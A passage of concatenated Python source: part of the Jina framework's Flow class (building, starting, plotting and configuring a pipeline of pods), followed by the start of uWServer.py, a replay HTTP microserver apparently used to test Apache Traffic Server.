with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(
needs={op_flow.last_pod},
graph_description=op_flow._get_graph_representation(),
pod_addresses=op_flow._get_pod_addresses(),
)
removed_pods = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_pod_nodes = OrderedDict()
for k, v in op_flow._pod_nodes.items():
if not v.role.is_inspect:
filtered_pod_nodes[k] = v
else:
removed_pods.append(v.name)
op_flow._pod_nodes = filtered_pod_nodes
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
while (
len(op_flow._last_changed_pod) > 0
and len(removed_pods) > 0
and op_flow.last_pod in removed_pods
):
op_flow._last_changed_pod.pop()
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double check if it is intentional or some mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_pods) > 0:
# very dirty
op_flow._pod_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._pod_nodes[GATEWAY_NAME].args.pod_addresses = json.dumps(
op_flow._get_pod_addresses()
)
op_flow._pod_nodes[GATEWAY_NAME].update_pea_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines make 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.Pea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
if self.k8s_infrastructure_manager is not None:
self.enter_context(self.k8s_infrastructure_manager)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not getattr(v.args, 'external', False):
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not getattr(_pod.args, 'external', False):
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = None
if self.args.infrastructure != InfrastructureType.K8S:
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted due to {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
if self.args.infrastructure == InfrastructureType.K8S:
success_msg = colored('🎉 Kubernetes Flow is ready to use!', 'green')
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
"""Get the number of peas (shards count) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Identification is defined by whether two flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, gateway connection can be better showed
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as URL points to a SVG. It needs internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the url points to a SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that onces set will resume the control Flow
to main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is running already, protocol cant be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pea_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
uses_with=uses_with,
any_event_loop=True,
)
def scale(
self,
pod_name: str,
replicas: int,
):
"""
Scale the amount of replicas of a given Executor.
:param pod_name: pod to update
:param replicas: The number of replicas to scale to
"""
# TODO when replicas-host is ready, needs to be passed here
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].scale,
replicas=replicas,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
|
uWServer.py
|
#!/bin/env python3
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
import http.client
import cgi
import time
import sys
import json
import os
import threading
from ipaddress import ip_address
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn, ForkingMixIn, BaseServer
from http import HTTPStatus
import argparse
import ssl
import socket
import importlib.util
import time
test_mode_enabled = True
lookup_key_ = "{PATH}"
__version__ = "1.0"
sys.path.append(
os.path.normpath(
os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'..'
)
)
)
import sessionvalidation.sessionvalidation as sv
SERVER_PORT = 5005 # default port
SERVER_DELAY = 0 # default delay
HTTP_VERSION = 'HTTP/1.1'
G_replay_dict = {}
count = 0
# Simple class to hold lists of callbacks associated with a key.
class HookSet:
# Helper class to provide controlled access to the HookSet to the loading module.
class Registrar:
def __init__(self, hook_set):
self.hooks = hook_set
def register(self, hook, cb):
self.hooks.register(hook, cb)
def __init__(self):
self.hooks = {}
self.modules = []
self.registrar = HookSet.Registrar(self)
# Define all the valid hooks here.
for item in ['ReadRequestHook']:
if isinstance(item, list):
hook = item[0]
label = item[1]
else:
hook = label = item
exec("HookSet.{} = '{}'".format(label, hook))
exec("HookSet.Registrar.{} = '{}'".format(label, hook))
self.hooks[hook] = []
def load(self, source):
try:
spec = importlib.util.spec_from_file_location('Observer', source)
mod = importlib.util.module_from_spec(spec)
mod.Hooks = self.registrar
spec.loader.exec_module(mod)
except ImportError:
print("Failed to import {}".format(source))
else:
self.modules.append(mod)
# Add a callback cb to the hook.
# Error if the hook isn't defined.
def register(self, hook, cb):
if hook in self.hooks:
self.hooks[hook].append(cb)
else:
raise ValueError("{} is not a valid hook name".format(hook))
# Invoke a hook. Pass on any additional arguments to the callback.
def invoke(self, hook, *args, **kwargs):
cb_list = self.hooks[hook]
if cb_list == None:
raise ValueError("{} is not a valid hook name to invoke".format(hook))
else:
for cb in cb_list:
cb(*args, **kwargs)
class ThreadingServer(ThreadingMixIn, HTTPServer):
'''This class forces the creation of a new thread on each connection'''
def __init__(self, local_addr, handler_class, options):
HTTPServer.__init__(self, local_addr, handler_class)
self.hook_set = HookSet()
if (options.load):
self.hook_set.load(options.load)
class ForkingServer(ForkingMixIn, HTTPServer):
'''This class forces the creation of a new process on each connection'''
pass
class SSLServer(ThreadingMixIn, HTTPServer):
def __init__(self, server_address, HandlerClass, options):
BaseServer.__init__(self, server_address, HandlerClass)
pwd = os.path.dirname(os.path.realpath(__file__))
keys = os.path.join(pwd, options.key)
certs = os.path.join(pwd, options.cert)
self.options = options
self.hook_set = HookSet()
self.daemon_threads = True
self.protocol_version = 'HTTP/1.1'
if options.load:
self.hook_set.load(options.load)
if options.clientverify:
self.socket = ssl.wrap_socket(socket.socket(self.address_family, self.socket_type),
keyfile=keys, certfile=certs, server_side=True, cert_reqs=ssl.CERT_REQUIRED, ca_certs='/etc/ssl/certs/ca-certificates.crt')
else:
self.socket = ssl.wrap_socket(socket.socket(self.address_family, self.socket_type),
keyfile=keys, certfile=certs, server_side=True)
self.server_bind()
self.server_activate()
print("Port Configured for SSL communication")
class MyHandler(BaseHTTPRequestHandler):
def handleExpect100Continue(self, contentLength, chunked=False):
print("....expect", contentLength)
self.wfile.write(bytes('HTTP/1.1 100 Continue\r\n\r\n', 'UTF-8'))
# self.send_response(HTTPStatus.CONTINUE)
# self.send_header('Server','blablabla')
#self.send_header('Connection', 'keep-alive')
# self.end_headers()
if(not chunked):
message = self.rfile.read(contentLength)
else:
readChunks()
def getLookupKey(self, requestline):
global lookup_key_
kpath = ""
path = ""
url_part = requestline.split(" ")
if url_part:
if url_part[1].startswith("http"):
path = url_part[1].split("/", 2)[2]
host_, path = path.split("/", 1)
else:
path = url_part[1].split("/", 1)[1]
argsList = []
keyslist = lookup_key_.split("}")
for keystr in keyslist:
if keystr == '{PATH':
kpath = kpath + path
continue # do not include path in the list of header fields
if keystr == '{HOST':
kpath = kpath + host_
continue
stringk = keystr.replace("{%", "")
argsList.append(stringk)
KeyList = []
for argsL in argsList:
print("args", argsL, len(argsL))
if len(argsL) > 0:
val = self.headers.get(argsL)
if val:
field_val, __ = cgi.parse_header(val)
else:
field_val = None
if field_val != None:
KeyList.append(field_val)
key = "".join(KeyList) + kpath
print("lookup key", key, len(key))
return key
def parseRequestline(self, requestline):
testName = None
return testName
def testMode(self, requestline):
print(requestline)
key = self.parseRequestline(requestline)
self.send_response(200)
self.send_header('Connection', 'close')
self.end_headers()
def get_response_code(self, header):
# this could totally go wrong
return int(header.split(' ')[1])
def generator(self):
yield 'micro'
yield 'server'
yield 'apache'
yield 'traffic'
yield 'server'
def send_response(self, code, message=None):
''' Override `send_response()`'s tacking on of server and date header lines. '''
# self.log_request(code)
self.send_response_only(code, message)
def createDummyBodywithLength(self, numberOfbytes):
if numberOfbytes == 0:
return None
body = 'a'
while numberOfbytes != 1:
body += 'b'
numberOfbytes -= 1
return body
def writeChunkedData(self):
for chunk in self.generator():
response_string = bytes('%X\r\n%s\r\n' % (len(chunk), chunk), 'UTF-8')
self.wfile.write(response_string)
response_string = bytes('0\r\n\r\n', 'UTF-8')
self.wfile.write(response_string)
def readChunks(self):
raw_data = b''
raw_size = self.rfile.readline(65537)
size = str(raw_size, 'UTF-8').rstrip('\r\n')
# print("==========================================>",size)
size = int(size, 16)
while size > 0:
#print("reading bytes",raw_size)
chunk = self.rfile.read(size + 2) # 2 for reading /r/n
#print("cuhnk: ",chunk)
raw_data += chunk
raw_size = self.rfile.readline(65537)
size = str(raw_size, 'UTF-8').rstrip('\r\n')
size = int(size, 16)
#print("full chunk",raw_data)
chunk = self.rfile.readline(65537) # read the extra blank newline \r\n after the last chunk
def send_header(self, keyword, value):
"""Send a MIME header to the headers buffer."""
if self.request_version != 'HTTP/0.9':
if not hasattr(self, '_headers_buffer'):
self._headers_buffer = []
self._headers_buffer.append(
("%s: %s\r\n" % (keyword, value)).encode('UTF-8', 'strict')) # original code used latin-1.. seriously?
if keyword.lower() == 'connection':
if value.lower() == 'close':
self.close_connection = True
elif value.lower() == 'keep-alive':
self.close_connection = False
def parse_request(self):
"""Parse a request (internal).
The request should be stored in self.raw_requestline; the results
are in self.command, self.path, self.request_version and
self.headers.
Return True for success, False for failure; on failure, an
error is sent back.
"""
global count, test_mode_enabled
self.command = None # set in case of error on the first line
self.request_version = version = self.default_request_version
self.close_connection = True
requestline = str(self.raw_requestline, 'UTF-8')
# print("request",requestline)
requestline = requestline.rstrip('\r\n')
self.requestline = requestline
# Examine the headers and look for a Connection directive.
try:
self.headers = http.client.parse_headers(self.rfile,
_class=self.MessageClass)
self.server.hook_set.invoke(HookSet.ReadRequestHook, self.headers)
# read message body
if self.headers.get('Content-Length') != None:
bodysize = int(self.headers.get('Content-Length'))
#print("length of the body is",bodysize)
message = self.rfile.read(bodysize)
#print("message body",message)
elif self.headers.get('Transfer-Encoding', "") == 'chunked':
# print(self.headers)
self.readChunks()
except http.client.LineTooLong:
self.send_error(
HTTPStatus.BAD_REQUEST,
"Line too long")
return False
except http.client.HTTPException as err:
self.send_error(
HTTPStatus.REQUEST_HEADER_FIELDS_TOO_LARGE,
"Too many headers",
str(err)
)
return False
words = requestline.split()
if len(words) == 3:
command, path, version = words
if version[:5] != 'HTTP/':
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad request version (%r)" % version)
return False
try:
base_version_number = version.split('/', 1)[1]
version_number = base_version_number.split(".")
# RFC 2145 section 3.1 says there can be only one "." and
# - major and minor numbers MUST be treated as
# separate integers;
# - HTTP/2.4 is a lower version than HTTP/2.13, which in
# turn is lower than HTTP/12.3;
# - Leading zeros MUST be ignored by recipients.
if len(version_number) != 2:
raise ValueError
version_number = int(version_number[0]), int(version_number[1])
except (ValueError, IndexError):
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad request version (%r)" % version)
return False
if version_number >= (1, 1) and self.protocol_version >= "HTTP/1.1":
self.close_connection = False
if version_number >= (2, 0):
self.send_error(
HTTPStatus.HTTP_VERSION_NOT_SUPPORTED,
"Invalid HTTP Version (%s)" % base_version_number)
return False
elif len(words) == 2:
command, path = words
self.close_connection = True
if command != 'GET':
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad HTTP/0.9 request type (%r)" % command)
return False
elif not words:
count += 1
print("bla bla on 157 {0} => {1}".format(count, self.close_connection))
return False
else:
self.send_error(
HTTPStatus.BAD_REQUEST,
"Bad request syntax (%r)" % requestline)
return False
self.command, self.path, self.request_version = command, path, version
conntype = self.headers.get('Connection', "")
if conntype.lower() == 'close':
self.close_connection = True
elif (conntype.lower() == 'keep-alive' and
self.protocol_version >= "HTTP/1.1"):
self.close_connection = False
return True
def do_GET(self):
global G_replay_dict, test_mode_enabled
if test_mode_enabled:
time.sleep(time_delay)
request_hash = self.getLookupKey(self.requestline)
else:
request_hash, __ = cgi.parse_header(self.headers.get('Content-MD5'))
# print("key:",request_hash)
try:
response_string = None
chunkedResponse = False
if request_hash not in G_replay_dict:
self.send_response(404)
self.send_header('Server', 'MicroServer')
self.send_header('Connection', 'close')
self.end_headers()
else:
resp = G_replay_dict[request_hash]
headers = resp.getHeaders().split('\r\n')
# set status codes
status_code = self.get_response_code(headers[0])
self.send_response(status_code)
# set headers
for header in headers[1:]: # skip first one b/c it's response code
if header == '':
continue
elif 'Content-Length' in header:
if 'Access-Control' in header: # skipping Access-Control-Allow-Credentials, Access-Control-Allow-Origin, Content-Length
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
self.send_header(header_field, header_field_val)
continue
lengthSTR = header.split(':')[1]
length = lengthSTR.strip(' ')
if test_mode_enabled: # the length of the body is given priority in test mode rather than the value in Content-Length. But in replay mode Content-Length gets the priority
if not (resp and resp.getBody()): # Don't attach content-length yet if body is present in the response specified by tester
self.send_header('Content-Length', str(length))
else:
self.send_header('Content-Length', str(length))
response_string = self.createDummyBodywithLength(int(length))
continue
if 'Transfer-Encoding' in header:
self.send_header('Transfer-Encoding', 'Chunked')
response_string = '%X\r\n%s\r\n' % (len('ats'), 'ats')
chunkedResponse = True
continue
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
# print("{0} === >{1}".format(header_field, header_field_val))
self.send_header(header_field, header_field_val)
# End for
if test_mode_enabled:
if resp and resp.getBody():
length = len(bytes(resp.getBody(), 'UTF-8'))
response_string = resp.getBody()
self.send_header('Content-Length', str(length))
self.end_headers()
if (chunkedResponse):
self.writeChunkedData()
elif response_string != None and response_string != '':
self.wfile.write(bytes(response_string, 'UTF-8'))
return
except:
e = sys.exc_info()
print("Error", e, self.headers)
self.send_response(400)
self.send_header('Connection', 'close')
self.end_headers()
def do_HEAD(self):
global G_replay_dict, test_mode_enabled
if test_mode_enabled:
request_hash = self.getLookupKey(self.requestline)
else:
request_hash, __ = cgi.parse_header(self.headers.get('Content-MD5'))
